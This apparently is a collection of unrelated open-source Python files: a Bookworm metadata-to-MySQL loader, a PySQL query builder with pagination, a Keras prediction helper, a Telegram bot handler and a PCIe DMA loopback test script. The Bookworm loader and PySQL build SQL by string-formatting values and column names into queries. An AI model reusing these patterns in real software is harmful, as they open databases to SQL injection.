"REPLACE", "REQUIRE", "RESIGNAL", "RESTRICT", "RETURN", "REVOKE", "RIGHT", "RLIKE", "SCHEMA", "SCHEMAS", "SECOND_MICROSECOND", "SELECT", "SENSITIVE", "SEPARATOR", "SET", "SHOW", "SIGNAL", "SLOW[d]", "SMALLINT", "SPATIAL", "SPECIFIC", "SQL", "SQLEXCEPTION", "SQLSTATE", "SQLWARNING", "SQL_BIG_RESULT", "SQL_CALC_FOUND_ROWS", "SQL_SMALL_RESULT", "SSL", "STARTING", "STRAIGHT_JOIN", "TABLE", "TERMINATED", "THEN", "TINYBLOB", "TINYINT", "TINYTEXT", "TO", "TRAILING", "TRIGGER", "TRUE", "UNDO", "UNION", "UNIQUE", "UNLOCK", "UNSIGNED", "UPDATE", "USAGE", "USE", "USING", "UTC_DATE", "UTC_TIME", "UTC_TIMESTAMP", "VALUES", "VARBINARY", "VARCHAR", "VARCHARACTER", "VARYING", "WHEN", "WHERE", "WHILE", "WITH", "WRITE", "XOR", "YEAR_MONTH", "ZEROFILL"])
class variableSet:
def __init__(self,
originFile="files/metadata/jsoncatalog_derived.txt",
anchorField="bookid",
jsonDefinition=None,
db=None):
self.db = db
self.dbname = db.dbname
self.anchorField = anchorField
self.originFile=originFile
self.jsonDefinition=jsonDefinition
if jsonDefinition==None:
#Make a guess, why not?
warnings.warn("""No field_descriptions file specified, so guessing based on variable names.
Unintended consequences are possible""")
self.jsonDefinition=self.guessAtFieldDescriptions()
else:
self.jsonDefinition = json.loads(open(jsonDefinition,"r").read())
self.setTableNames()
self.catalogLocation = "files/metadata/" + self.tableName + ".txt"
self.variables = []
for item in self.jsonDefinition:
#The anchor field has special methods hard coded in.
if item['field'] == self.anchorField:
continue
if item['field'].upper() in mySQLreservedWords:
warnings.warn(item['field'] + """ is a reserved word in MySQL, so can't be used as a Bookworm field name: skipping it for now, but you probably want to rename it to something different""")
item['field'] = item['field'] + "___"
continue
self.variables.append(dataField(item,self.db,anchor=anchorField,table=self.tableName,fasttab=self.fastName))
def setTableNames(self):
"""
For the base case, they're catalog and fastcat: otherwise, it's just they key
and the first variable associated with it.
"""
if self.originFile == "files/metadata/jsoncatalog_derived.txt":
self.tableName = "catalog"
self.fastName = "fastcat"
else:
try:
self.tableName = self.jsonDefinition[0]['field'] + "_" + self.jsonDefinition[1]['field']
except IndexError:
#if it's only one element long, just name it after the variable itself.
self.tableName = self.jsonDefinition[0]['field']
self.fastName = self.tableName + "heap"
def guessAtFieldDescriptions(self,stopAfter=30000):
allMyKeys = dict()
i=1
unique = True
for line in open(self.originFile):
i += 1
entry = json.loads(line)
for key in entry:
if type(entry[key])==list:
unique=False
else:
#Treat it for counting sake as a single element list.
entry[key] = [entry[key]]
for value in entry[key]:
try:
allMyKeys[key][value] += 1
except KeyError:
try:
allMyKeys[key][value] = 1
except KeyError:
allMyKeys[key] = dict()
allMyKeys[key][value] = 1
if i > stopAfter:
break
myOutput = []
for metadata in allMyKeys:
bestGuess = guessBasedOnNameAndContents(metadata,allMyKeys[metadata])
if unique==False:
bestGuess['unique'] = False
myOutput.append(bestGuess)
myOutput = [output for output in myOutput if output["field"] != "filename"]
return myOutput
def uniques(self):
return [variable for variable in self.variables if variable.unique]
def notUniques(self):
return [variable for variable in self.variables if not variable.unique]
def anchorLookupDictionary(self):
db = self.db
anchor = self.anchorField
self.fastAnchor = self.anchorField
if anchor=="bookid" or anchor=="filename":
self.fastAnchor = "bookid"
bookids = textids()
for variable in self.variables:
variable.anchor=self.fastAnchor
else:
query = """SELECT alias FROM masterVariableTable WHERE dbname='%s'""" % (anchor)
bookids = dict()
cursor = db.query("SELECT alias FROM masterVariableTable WHERE dbname = '%s'" % anchor)
try:
fastAnchor = cursor.fetchall()[0][0]
except:
if anchor in ["bookid","filename"]:
fastAnchor="bookid"
print anchor + "\n\n"
self.fastAnchor=fastAnchor
if fastAnchor != anchor:
results = db.query("SELECT * FROM %sLookup;" % (anchor))
for row in results.fetchall():
bookids[row[1]] = row[0]
self.anchor=fastAnchor
for variable in self.variables:
variable.anchor = fastAnchor
else:
#construct a phony dictionary that just returns what you gave
bookids = selfDictionary()
return bookids
def writeMetadata(self,limit=float("Inf")):
#Write out all the metadata into files that MySQL is able to read in.
"""
This is a general purpose, with a few special cases for the primary use case that this is the
"catalog" table that hold the primary lookup information.
"""
linenum = 1
variables = self.variables
bookids = self.anchorLookupDictionary()
metadatafile = open(self.originFile)
#Open files for writing to
catalog = open(self.catalogLocation,'w')
for variable in [variable for variable in variables if not variable.unique]:
variable.output = open(variable.outputloc, 'w')
for entry in metadatafile:
try:
#entry = to_unicode(entry)
#entry = entry.replace('\\n', ' ')
entry = json.loads(entry)
except:
warnings.warn("""WARNING: json parsing failed for this JSON line:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""" + entry)
continue
#We always lead with the bookid and the filename.
#Unicode characters in filenames may cause problems?
if self.anchorField=="bookid":
self.anchorField="filename"
filename = to_unicode(entry[self.anchorField])
try:
bookid = bookids[entry[self.anchorField]]
except KeyError:
if self.tableName=="catalog":
bookid = bookids.bump(entry[self.anchorField])
else:
#If the key isn't in the name table, we have no use for this entry.
continue
mainfields = [str(bookid),to_unicode(entry[self.anchorField])]
if self.tableName != "catalog":
#It can get problematic to have them both, so we're just writing over the
#anchorField here.
mainfields = [str(bookid)]
#First, pull the unique variables and write them to the 'catalog' table
for var in [variable for variable in variables if variable.unique]:
if var.field not in [self.anchorField,self.fastAnchor]:
myfield = entry.get(var.field, "")
if myfield is None:
myfield = ''
mainfields.append(to_unicode(myfield))
catalogtext = '%s\n' % '\t'.join(mainfields)
catalog.write(catalogtext.encode('utf-8'))
for variable in [variable for variable in variables if not variable.unique]:
#Each of these has a different file it must write to...
outfile = variable.output
lines = entry.get(variable.field, [])
if isinstance(lines, basestring):
"""
Allow a single element to be represented as a string
"""
lines = [lines]
if lines==None:
lines = []
for line in lines:
try:
writing = '%s\t%s\n' % (str(bookid), line)
outfile.write(writing.encode('utf-8'))
except:
warnings.warn("some sort of error with bookid no. " +str(bookid) + ": " + json.dumps(lines))
pass
if linenum > limit:
break
linenum=linenum+1
for variable in [variable for variable in variables if not variable.unique]:
variable.output.close()
try:
bookids.close()
except AttributeError:
#When it's a pure dictionary, not the weird textfile hybrid
pass
catalog.close()
def loadMetadata(self):
"""
Load in the metadata files which have already been created elsewhere.
"""
#This function is called for the sideffect of assigning a `fastAnchor` field
bookwormcodes = self.anchorLookupDictionary()
db = self.db
print "Making a SQL table to hold the catalog data"
if self.tableName=="catalog":
"""A few necessary basic fields"""
mysqlfields = ["bookid MEDIUMINT UNSIGNED, PRIMARY KEY(bookid)", "filename VARCHAR(255)", "nwords INT"]
else:
mysqlfields = ["%s MEDIUMINT UNSIGNED, PRIMARY KEY (%s)" % (self.fastAnchor,self.fastAnchor)]
for variable in self.uniques():
createstring = variable.slowSQL(withIndex=True)
mysqlfields.append(createstring)
if len(mysqlfields) > 1:
#This creates the main (slow) catalog table
db.query("""DROP TABLE IF EXISTS %s """ % self.tableName)
createcode = """CREATE TABLE IF NOT EXISTS %s (
""" %self.tableName + ",\n".join(mysqlfields) + ") ENGINE=MYISAM;"
db.query(createcode)
#Never have keys before a LOAD DATA INFILE
db.query("ALTER TABLE %s DISABLE KEYS" % self.tableName)
print "loading data into %s using LOAD DATA LOCAL INFILE..." % self.tableName
anchorFields = self.fastAnchor
if self.tableName=="catalog":
anchorFields = "bookid,filename"
loadEntries = {
"catLoc" : self.catalogLocation,
"tabName" : self.tableName,
"anchorFields" : anchorFields,
"loadingFields" : anchorFields+ "," + ','.join([field.field for field in self.variables if field.unique])
}
loadEntries['loadingFields'] = loadEntries['loadingFields'].rstrip(',')
loadcode = """LOAD DATA LOCAL INFILE '%(catLoc)s'
INTO TABLE %(tabName)s FIELDS ESCAPED BY ''
(%(loadingFields)s)""" % loadEntries
db.query(loadcode)
print "enabling keys on %s" %self.tableName
db.query("ALTER TABLE %s ENABLE KEYS" % self.tableName)
#If there isn't a 'searchstring' field, it may need to be coerced in somewhere hereabouts
#This here stores the number of words in between catalog updates, so that the full word counts only have to be done once since they're time consuming.
if self.tableName=="catalog":
self.createNwordsFile()
for variable in self.notUniques():
variable.buildDiskTable()
for variable in self.variables:
if variable.datatype=="categorical":
variable.buildIDTable()
def uniqueVariableFastSetup(self):
fileCommand = """DROP TABLE IF EXISTS tmp;
CREATE TABLE tmp
(""" + self.fastAnchor + """ MEDIUMINT, PRIMARY KEY (""" + self.fastAnchor + """),
""" +",\n".join([variable.fastSQL() for variable in self.variables if (variable.unique and variable.fastSQL() is not None)]) + """
) ENGINE=MEMORY;\n"""
fileCommand += "INSERT INTO tmp SELECT " + self.fastAnchor + ", " + ",".join([variable.fastField for variable in self.variables if variable.unique and variable.fastSQL() is not None]) + " FROM %s " % self.tableName + " ".join([" JOIN %(field)s__id USING (%(field)s ) " % variable.__dict__ for variable in self.variables if variable.unique and variable.fastSQL() is not None and variable.datatype=="categorical"])+ ";\n"
fileCommand += "DROP TABLE IF EXISTS %s;\n" % self.fastName
fileCommand += "RENAME TABLE tmp TO %s;\n" % self.fastName
return fileCommand
def updateMasterVariableTable(self):
"""
All the categorical variables get a lookup table;
we store the create code in the databse;
"""
for variable in self.variables:
variable.updateVariableDescriptionTable();
inCatalog = self.uniques()
if len(inCatalog) > 0 and self.tableName!="catalog":
#catalog has separate rules handled in CreateDatabase.py; so this builds
#the big rectangular table otherwise.
#It will fail if masterTableTable doesn't exister.
fileCommand = self.uniqueVariableFastSetup()
try:
parentTab = self.db.query("""
SELECT tablename FROM masterVariableTable
WHERE dbname='%s'""" % self.fastAnchor).fetchall()[0][0]
except:
if self.fastAnchor=="bookid":
parentTab="fastcat"
else:
print("Unable to find a table to join the anchor (%s) against" % self.fastAnchor)
raise
self.db.query('DELETE FROM masterTableTable WHERE masterTableTable.tablename="%s";' %self.fastName)
self.db.query("INSERT IGNORE INTO masterTableTable VALUES ('%s','%s','%s')" % (self.fastName,parentTab,escape_string(fileCommand)))
def createNwordsFile(self):
"""
A necessary supplement to the `catalog` table.
"""
db = self.db
db.query("CREATE TABLE IF NOT EXISTS nwords (bookid MEDIUMINT UNSIGNED, PRIMARY KEY (bookid), nwords INT);")
db.query("UPDATE catalog JOIN nwords USING (bookid) SET catalog.nwords = nwords.nwords")
db.query("INSERT INTO nwords (bookid,nwords) SELECT catalog.bookid,sum(count) FROM catalog LEFT JOIN nwords USING (bookid) JOIN master_bookcounts USING (bookid) WHERE nwords.bookid IS NULL GROUP BY catalog.bookid")
db.query("UPDATE catalog JOIN nwords USING (bookid) SET catalog.nwords = nwords.nwords")
class selfDictionary():
"""
Stupid little hack.
Looks like a dictionary, but just returns itself.
Used in cases where we don't actually need the dictionary.
"""
def __init__(self):
pass
def __getitem__(self,string):
return string
| 47.819499 | 2,558 | 0.582477 | 31,719 | 0.873922 | 0 | 0 | 0 | 0 | 0 | 0 | 17,181 | 0.473371 |
eac66d468a7e07323da015ce90324eb30ccacdcf | 17,976 | py | Python | pysql.py | morfat/PySQL | a887977ec7fc17e34c03027f044c40539d12e046 | [
"MIT"
] | null | null | null | pysql.py | morfat/PySQL | a887977ec7fc17e34c03027f044c40539d12e046 | [
"MIT"
] | null | null | null | pysql.py | morfat/PySQL | a887977ec7fc17e34c03027f044c40539d12e046 | [
"MIT"
] | 1 | 2020-09-14T17:32:59.000Z | 2020-09-14T17:32:59.000Z | import MySQLdb
from urllib import parse
class PySQL:
"""
For making Mariadb / Mysql db queries
"""
FILTER_COMMANDS = {
"$eq":" = %s ",
"$in":" IN (%s) ",
"$nin":" NOT IN (%s) ",
"$neq":" != %s ",
"$lt":" < %s ",
"$lte":" <= %s ",
"$gt":" > %s ",
"$gte":" >= %s ",
"$contains":" LIKE %s ",#like %var%
"$ncontains":" NOT LIKE %s ",#
"$null":" IS NULL ", #if 1 else "IS NOT NULL" if 0
"$sw":" LIKE %s ",#starts with . like %var
"$ew":" LIKE %s "# endswith like var%
}
def __init__(self,user,password,db,host,port):
self._mysqldb_connection = MySQLdb.connect(user=user,passwd=password,db=db,host=host,port=port)
def commit(self):
return self._mysqldb_connection.commit()
def rollback(self):
return self._mysqldb_connection.rollback()
def close(self):
return self._mysqldb_connection.close()
def execute(self,sql,params=None,many=None,dict_cursor=True):
#runs the db query . can also be used to run raw queries directly
""" by default returns cursor object """
if dict_cursor:
self.cursor = self._mysqldb_connection.cursor(MySQLdb.cursors.DictCursor)
else:
self.cursor = self._mysqldb_connection.cursor()
if many:
self.cursor.executemany(sql,params)
else:
self.cursor.execute(sql,params)
return self.cursor
#PySQL specific method begin from here
def __getattr__(self,item):
self.table_name = item
self.columns = ['*'] #columns selected for display of records
self.query_params = [] #for db filtering . parameters entered.
self.sql = ''
self.where_sql = ''
self.join_sql = ''
self.order_by_sql = ''
self.group_by_sql = ''
self.limit_sql = ''
self.cursor = None
return self
def __make_table_column(self,column,table_name=None):
"""Example
Input: => Output:
users.id => users.id
name => users.name
"""
if '.' in column:
return column
return "{}.{}".format(table_name,column) if table_name else "{}.{}".format(self.table_name,column)
def get_columns(self):
return ','.join([self.__make_table_column(c) for c in self.columns])
def fields(self,columns):
#sets columns to select
""" Example: ['id','name']
"""
self.columns = columns
return self
def fetch(self,limit=None):
if not self.cursor:
self.__make_select_sql(limit=limit)
print (self.sql)
print (self.query_params)
self.cursor = self.execute(self.sql,self.query_params)
results = self.cursor.fetchall()
self.cursor.close()
return results
def fetch_one(self):
if not self.cursor:
self.__make_select_sql(limit=None)
self.cursor = self.execute(self.sql,self.query_params)
result = self.cursor.fetchone()
self.cursor.close()
return result
def __set_where(self,where_sql):
if self.where_sql:
#check if where starts with AND or OR
where_sql = where_sql.strip()
if where_sql.startswith('OR') or where_sql.startswith("AND"):
self.where_sql = self.where_sql + " " + where_sql
else:
self.where_sql = self.where_sql + " AND " + where_sql
else:
self.where_sql = " WHERE {} ".format(where_sql)
def __make_sql(self,sql):
if sql:
self.sql = self.sql + sql
def __make_select_sql(self,limit):
self.sql = "SELECT {} FROM {} ".format(self.get_columns(),self.table_name)
self.__make_sql(self.join_sql)
self.__make_sql(self.where_sql)
self.__make_sql(self.group_by_sql)
self.__make_sql(self.order_by_sql)
self.__limit(limit)
def __make_filter(self,k,v):
#check if val is dict
col = k
filter_v = None #the filter value e.g name like '%mosoti%'
param = v
print ("Param: ",param, "column:",col)
if isinstance(param,dict):
filter_v , param = [(k,v) for k,v in param.items()][0]
else:
filter_v = "$eq"
if filter_v == "$null":
if v.get(filter_v) is False:
filter_v = " IS NOT NULL "
else:
filter_v = " IS NULL "
param = None
elif filter_v == "$in":
filter_v = " IN ({}) ".format(','.join(['%s' for i in param]))
elif filter_v == "$nin":
filter_v = " NOT IN ({}) ".format(','.join(['%s' for i in param]))
else:
if filter_v == '$contains' or filter_v == "$ncontains":
param = '%{}%'.format(str(param))
elif filter_v == "$sw":
param = '{}%'.format(str(param))
elif filter_v == "$ew":
param = '%{}'.format(str(param))
filter_v = self.FILTER_COMMANDS.get(filter_v)
return (param,filter_v,)
def __make_or_query_filter(self,data_list):
qs_l =[]
for d in data_list:
for ok,ov in d.items():
param,filter_v = self.__make_filter(ok,ov)
self.__build_query_params(param)
q = self.__make_table_column(ok) + filter_v
qs_l.append(q)
query = ' OR '.join(qs_l)
return query
def __build_query_params(self,param):
#appends params to existinig
if param:
if isinstance(param,list):
for p in param:
self.query_params.append(p)
else:
self.query_params.append(param)
def __filter_query(self,filter_data):
#make filters
filter_q_l = []
for k,v in filter_data.items():
if k == '$or':
#make for or
qs_l =self.__make_or_query_filter(filter_data.get('$or'))
query = " OR " + qs_l
filter_q_l.append(query)
elif k == '$xor':
#make for or
qs_l = self.__make_or_query_filter(filter_data.get('$xor'))
query = " AND ( " + qs_l + " )"
filter_q_l.append(query)
else:
param,filter_v = self.__make_filter(k,v)
self.__build_query_params(param)
q = self.__make_table_column(k) + filter_v
if len(filter_q_l) == 0:
q = q
else:
q = " AND " + q
filter_q_l.append(q)
return filter_q_l
def filter(self,filter_data):
"""
Filters Requests
#example full including or
{ "name":{"$contains":"mosoti"},
"age":{"$lte":30},
"msisdn":"2541234567",
"$or":[{ "name":{"$contains":"mogaka"}},
{"age":31}
], #this evaluates to => .. OR name like '%mogaka%' OR age=31
"$xor":[{ "name":{"$contains":"mogaka"}},
{"age":31}
] # this evalautes to =>... AND ( name like '%mogaka%' OR age=31 )
}
"""
#reset vals /parameters so that we begin here
if filter_data:
filter_q_l = self.__filter_query(filter_data)
filters_qls = ''.join(filter_q_l).strip()
if filters_qls.startswith("AND"):
filters_qls = filters_qls[3:]
elif filters_qls.startswith("OR"):
filters_qls = filters_qls[2:]
self.__set_where(filters_qls)
return self
def fetch_paginated(self,paginator_obj):
#receives paginator object
order_by = paginator_obj.get_order_by()
filter_data = paginator_obj.get_filter_data()
page_size = paginator_obj.page_size
self.filter(filter_data)
self.order_by(order_by)
results = self.fetch(limit = page_size)
pagination_data = paginator_obj.get_pagination_data(results)
return {"results":results,"pagination":pagination_data}
def __limit(self,limit):
if limit:
self.__build_query_params(limit)
self.__make_sql(' LIMIT %s ')
def __get_order_by_text(self,val):
""" Receives string e.g -id or name """
if val.startswith('-'):
return "{} DESC".format(self.__make_table_column(val[1:]))
else:
return "{} ASC".format(self.__make_table_column(val))
def order_by(self,order_by_fields):
"""Expects list of fields e.g ['-id','name'] where - is DESC"""
order_by_sql = ','.join([self.__get_order_by_text(v) for v in order_by_fields])
if self.order_by_sql:
self.order_by_sql = self.order_by_sql + ' , ' + order_by_sql
else:
self.order_by_sql = " ORDER BY " + order_by_sql
return self
def group_by(self,group_by_fields):
""" Expects fields in list ['id','name'] ... """
group_by_sql = ','.join([self.__make_table_column(v) for v in group_by_fields])
if self.group_by_sql:
self.group_by_sql = self.group_by_sql + group_by_sql
else:
self.group_by_sql = " GROUP BY " + group_by_sql
return self
def __make_join(self,join_type,table_name,condition_data,related_fields):
""" makes join sql based on type of join and tables """
on_sql = []
for k,v in condition_data.items():
on_sql.append("{} = {} ".format(self.__make_table_column(k),self.__make_table_column(v,table_name)))
on_sql_str = ' ON {} ' .format(' AND '.join(on_sql))
join_type_sql = '{} {} '.format(join_type,table_name)
self.join_sql = self.join_sql + join_type_sql + on_sql_str
#append the columns to select based on related fields
if related_fields:
self.columns.extend([self.__make_table_column(c,table_name) for c in related_fields])
def inner_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... INNER JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('INNER JOIN',table_name,condition,related_fields)
return self
def right_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... RIGHT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('RIGHT JOIN',table_name,condition,related_fields)
return self
def left_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... LEFT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('LEFT JOIN',table_name,condition,related_fields)
return self
def update(self,new_data,limit=None):
""" set this new data as new details
Returns cursor object
"""
col_set = ','.join([" {} = %s ".format(k) for k,v in new_data.items()])
filter_params = self.query_params
self.query_params = []
update_params = [v for k,v in new_data.items()]
update_params.extend(filter_params) #we start with update thn filter
self.__build_query_params(update_params)
self.sql = "UPDATE {} SET {} ".format(self.table_name,col_set)
self.__make_sql(self.where_sql)
self.__limit(limit)
print(self.query_params)
print (self.sql)
return self.execute(self.sql,self.query_params)
def delete(self,limit=None):
""" Delete with given limit """
self.sql = "DELETE FROM {} ".format(self.table_name)
self.__make_sql(self.where_sql)
self.__limit(limit)
print (self.sql)
return self.execute(self.sql,self.query_params)
def insert(self,data):
"""
Creates records to db table . Expects a dict of key abd values pair
"""
columns = []
params = []
for k,v in data.items():
columns.append(k)
params.append(v)
column_placeholders = ','.join(["%s" for v in columns])
columns = ','.join([v for v in columns])
self.query_params = params
self.sql = "INSERT INTO {}({}) VALUES({})".format(self.table_name,columns,column_placeholders)
print (self.sql)
print (self.query_params)
return self.execute(self.sql,self.query_params).lastrowid
class Paginator:
def __init__(self,max_page_size=None,url=None,page_number=None,page_size=None,last_seen=None,last_seen_field_name=None,direction=None):
self.page_number = int(page_number) if page_number else 1
self.max_page_size = max_page_size if max_page_size else 1000
if page_size:
if int(page_size) > self.max_page_size:
self.page_size = self.max_page_size
else:
self.page_size = int(page_size)
else:
self.page_size = 25
self.last_seen_field_name = last_seen_field_name if last_seen_field_name else 'id'
self.direction = direction
self.last_seen = last_seen
self.url = url
self._where_clause = ''
self._params = []
def get_order_by(self):
order_by = []
if self.page_number == 1 or self.direction == 'next':
order_by = ["-{}".format(self.last_seen_field_name)] #order descending
elif self.direction == 'prev':
order_by = ["{}".format(self.last_seen_field_name)] #order ascending
return order_by
def get_filter_data(self):
filter_data = None
if self.page_number == 1:
filter_data = {}
elif self.direction == 'prev':
filter_data = {
"{}".format(self.last_seen_field_name):{"$gt":"%s"%(self.last_seen)}
}
elif self.direction == 'next':
filter_data = {
"{}".format(self.last_seen_field_name):{"$lt":"%s"%(self.last_seen)}
}
return filter_data
def get_next_link(self,results_list):
page = self.page_number + 1
url = self.url
if len(results_list) < self.page_size:
return None
if self.direction == 'prev' and page != 2:
last_seen_dict = results_list[:-1][0]
else:
last_seen_dict = results_list[-1:][0]
url=self.replace_query_param(url, 'page', page)
url=self.replace_query_param(url, 'dir', 'next')
url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
return url
def get_previous_link(self,results_list):
page=self.page_number - 1
url=self.url
if page == 0:
return None
elif len(results_list) == 0:
#return home link
url=self.remove_query_param(url, 'page')
url=self.remove_query_param(url, 'dir')
url=self.remove_query_param(url, 'last_seen')
return url
if self.direction == 'next' :
last_seen_dict = results_list[:-1][0]
else:
last_seen_dict = results_list[-1:][0]
#last_seen_dict = results_list[-1:][0]
url=self.replace_query_param(url, 'page', page)
url=self.replace_query_param(url, 'dir', 'prev')
url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
return url
def replace_query_param(self,url, key, val):
"""
Given a URL and a key/val pair, set or replace an item in the query
parameters of the URL, and return the new URL.
"""
(scheme, netloc, path, query, fragment) = parse.urlsplit(url)
query_dict = parse.parse_qs(query, keep_blank_values=True)
query_dict[str(key)] = [val]
query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
return parse.urlunsplit((scheme, netloc, path, query, fragment))
def remove_query_param(self,url, key):
"""
Given a URL and a key/val pair, remove an item in the query
parameters of the URL, and return the new URL.
"""
(scheme, netloc, path, query, fragment) = parse.urlsplit(url)
query_dict = parse.parse_qs(query, keep_blank_values=True)
query_dict.pop(key, None)
query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
return parse.urlunsplit((scheme, netloc, path, query, fragment))
def get_pagination_data(self,results_list):
return {'page_size':self.page_size,
'next_url': self.get_next_link(results_list),
'previous_url': self.get_previous_link(results_list)
} | 28.807692 | 139 | 0.547063 | 17,920 | 0.996885 | 0 | 0 | 0 | 0 | 0 | 0 | 3,722 | 0.207054 |
eac68a057a3c6cba41ec2dcf68da3a587bccdc99 | 634 | py | Python | src/preprocess.py | Mukulthakur17/Skin-Pigment-Analysis | 5db26fafd38466afa0698333a7b432a8daa8ee06 | [
"MIT"
] | 1 | 2021-04-14T10:08:33.000Z | 2021-04-14T10:08:33.000Z | src/preprocess.py | Mukulthakur17/Skin-Pigment-Analysis | 5db26fafd38466afa0698333a7b432a8daa8ee06 | [
"MIT"
] | null | null | null | src/preprocess.py | Mukulthakur17/Skin-Pigment-Analysis | 5db26fafd38466afa0698333a7b432a8daa8ee06 | [
"MIT"
] | null | null | null | from tensorflow.keras.preprocessing import image
from tensorflow.keras.models import model_from_json
import numpy as np
import tensorflow.keras.models as models
def predict(temp_file):
test_image = image.load_img(temp_file, target_size = (224, 224))
test_image = image.img_to_array(test_image)
test_image = np.expand_dims(test_image, axis = 0)
with open('Model Weights _ Json/model.json','r') as json_file:
json_model = json_file.read()
model = model_from_json(json_model)
model.load_weights('Model Weights _ Json/model_weights.h5')
result = model.predict(test_image)
return np.argmax(result)
| 39.625 | 68 | 0.753943 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.118297 |
eac859440d6090d9d16a4764c580ec95eb663ba2 | 310 | py | Python | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null |
from pyrogram import Client, Filters
@Client.on_message(Filters.command(["help"]))
async def start(client, message):
helptxt = f"Currently Only supports Youtube Single (No playlist) Just Send Youtube Url But You must join my Updation channel👉👉 @Mega_Bots_Updates"
await message.reply_text(helptxt)
| 34.444444 | 151 | 0.767742 | 0 | 0 | 0 | 0 | 275 | 0.870253 | 229 | 0.724684 | 149 | 0.471519 |
eac8dea19ee6c42664fa366fdf0d9ec7672d57ac | 4,865 | py | Python | software/scripts/LoopbackTesting.py | slaclab/pgp-pcie-apps | 12b2caa2774255dc748e42cb8296b4fe3c20444c | [
"BSD-3-Clause-LBNL"
] | 2 | 2019-01-31T01:15:23.000Z | 2021-03-12T11:56:10.000Z | software/scripts/LoopbackTesting.py | Tubbz-alt/pgp-pcie-apps | 14c63d7240d6e776ecbc25d20d208acd90cb194b | [
"BSD-3-Clause-LBNL"
] | null | null | null | software/scripts/LoopbackTesting.py | Tubbz-alt/pgp-pcie-apps | 14c63d7240d6e776ecbc25d20d208acd90cb194b | [
"BSD-3-Clause-LBNL"
] | 2 | 2020-09-17T12:47:38.000Z | 2020-12-12T23:09:06.000Z | #!/usr/bin/env python3
##############################################################################
## This file is part of 'PGP PCIe APP DEV'.
## It is subject to the license terms in the LICENSE.txt file found in the
## top-level directory of this distribution and at:
## https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
## No part of 'PGP PCIe APP DEV', including this file,
## may be copied, modified, propagated, or distributed except according to
## the terms contained in the LICENSE.txt file.
##############################################################################
import sys
import argparse
import rogue
import rogue.hardware.axi
import rogue.interfaces.stream
import rogue.interfaces.memory
import pyrogue as pr
import pyrogue.pydm
import pyrogue.utilities.prbs
import pyrogue.interfaces.simulation
import axipcie as pcie
import surf.protocols.ssi as ssi
# rogue.Logging.setLevel(rogue.Logging.Warning)
# rogue.Logging.setLevel(rogue.Logging.Debug)
#################################################################
# Set the argument parser
parser = argparse.ArgumentParser()
# Convert str to bool
argBool = lambda s: s.lower() in ['true', 't', 'yes', '1']
# Add arguments
parser.add_argument(
"--type",
type = str,
required = False,
default = 'pcie',
help = "define the type of interface",
)
parser.add_argument(
"--dev",
type = str,
required = False,
default = '/dev/datadev_0',
help = "path to device",
)
parser.add_argument(
"--numLane",
type = int,
required = False,
default = 1,
help = "# of DMA Lanes",
)
parser.add_argument(
"--numVc",
type = int,
required = False,
default = 1,
help = "# of VC (virtual channels)",
)
parser.add_argument(
"--pollEn",
type = argBool,
required = False,
default = True,
help = "Enable auto-polling",
)
parser.add_argument(
"--initRead",
type = argBool,
required = False,
default = True,
help = "Enable read all variables at start",
)
# Get the arguments
args = parser.parse_args()
#################################################################
class MyRoot(pr.Root):
def __init__( self,
name = "pciServer",
description = "DMA Loopback Testing",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#################################################################
self.dmaStream = [[None for x in range(args.numVc)] for y in range(args.numLane)]
self.prbsRx = [[None for x in range(args.numVc)] for y in range(args.numLane)]
self.prbTx = [[None for x in range(args.numVc)] for y in range(args.numLane)]
# DataDev PCIe Card
if ( args.type == 'pcie' ):
# Create PCIE memory mapped interface
self.memMap = rogue.hardware.axi.AxiMemMap(args.dev)
# Create the DMA loopback channel
for lane in range(args.numLane):
for vc in range(args.numVc):
self.dmaStream[lane][vc] = rogue.hardware.axi.AxiStreamDma(args.dev,(0x100*lane)+vc,1)
# VCS simulation
elif ( args.type == 'sim' ):
self.memMap = rogue.interfaces.memory.TcpClient('localhost',8000)
# Create the DMA loopback channel
for lane in range(args.numLane):
for vc in range(args.numVc):
self.dmaStream[lane][vc] = rogue.interfaces.stream.TcpClient('localhost',8002+(512*lane)+2*vc)
# Undefined device type
else:
raise ValueError("Invalid type (%s)" % (args.type) )
# Add the PCIe core device to base
self.add(pcie.AxiPcieCore(
memBase = self.memMap,
offset = 0x00000000,
numDmaLanes = args.numLane,
expand = True,
))
for lane in range(args.numLane):
for vc in range(args.numVc):
# Connect the SW PRBS Receiver module
self.prbsRx[lane][vc] = pr.utilities.prbs.PrbsRx(name=('SwPrbsRx[%d][%d]'%(lane,vc)),expand=True)
self.dmaStream[lane][vc] >> self.prbsRx[lane][vc]
self.add(self.prbsRx[lane][vc])
# Connect the SW PRBS Transmitter module
self.prbTx[lane][vc] = pr.utilities.prbs.PrbsTx(name=('SwPrbsTx[%d][%d]'%(lane,vc)),expand=True)
self.prbTx[lane][vc] >> self.dmaStream[lane][vc]
self.add(self.prbTx[lane][vc])
#################################################################
with MyRoot(pollEn=args.pollEn, initRead=args.initRead) as root:
pyrogue.pydm.runPyDM(root=root)
#################################################################
| 30.791139 | 114 | 0.542446 | 2,400 | 0.49332 | 0 | 0 | 0 | 0 | 0 | 0 | 1,725 | 0.354573 |
